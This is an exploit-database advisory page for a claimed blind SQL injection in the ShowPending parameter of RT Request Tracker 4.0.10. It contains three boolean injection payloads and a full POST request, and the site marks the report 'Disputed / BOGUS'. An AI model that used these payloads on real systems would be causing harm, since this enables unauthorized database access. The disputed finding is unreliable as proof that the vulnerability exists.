Bogus: RT: Request Tracker 4.0.10 SQL Injection ( Ascii Version )

Search:
WLB2

Disputed / BOGUS
RT: Request Tracker 4.0.10 SQL Injection

Published / (Updated)
Credit
Risk
2013-04-11 / 2013-12-23
cheki
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2013-3525
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Exploit Title: - SQL-Injection - RT: Request Tracker System
# Date: 10/05/2013
# Exploit Author: cheki
# Vendor Homepage: http://bestpractical.com/rt/
# Version: RT 4.0.10
# Tested on: Kali Linux

############################################
URL: http://10.10.10.70/Approvals/
Entity: ShowPending (Parameter) 
Risk: It is possible to view, modify or delete database entries and tables
Causes: Sanitation of hazardous characters was not performed correctly on user input
Fix: Review possible solutions for hazardous character injection

#Description: Blind SQL Injection: append Boolean True/False string expressions, using apostrophes
and commenting out the rest of the query.
#The following changes were applied the original request
1) Set parameter 'ShowPending's value to '1%27+and+%27f%27%3D%27f%27%29+--+'
2) Set parameter 'ShowPending's value to '1%27+and+%27b%27%3D%27f%27%29+--'
3) Set parameter 'ShowPending's value to '1%27+or+%27b%27%3D%27f%27%29+--'


POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://10.10.10.70/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR
3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefor
e=&CreatedAfter=

###############################################
Reasoning: The test result seems to indicate a vulnerability because it shows that values 
can be appended to parameter values,  indicating that they were embedded in an SQL query.HEX(0D)HEX(0A)In 
this test, three (or sometimes four) requests are  sent. The last is logically equal to the original, and the 
next­to­last is different. Any others are for control purposes. A  comparison of the last two responses with 
the first (the last is similar to it, and the next­to­last is different) indicates that  the application is vulnerable.


Home Page: securitylabnews.blogspot.com

References:

http://bestpractical.com/rt/

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version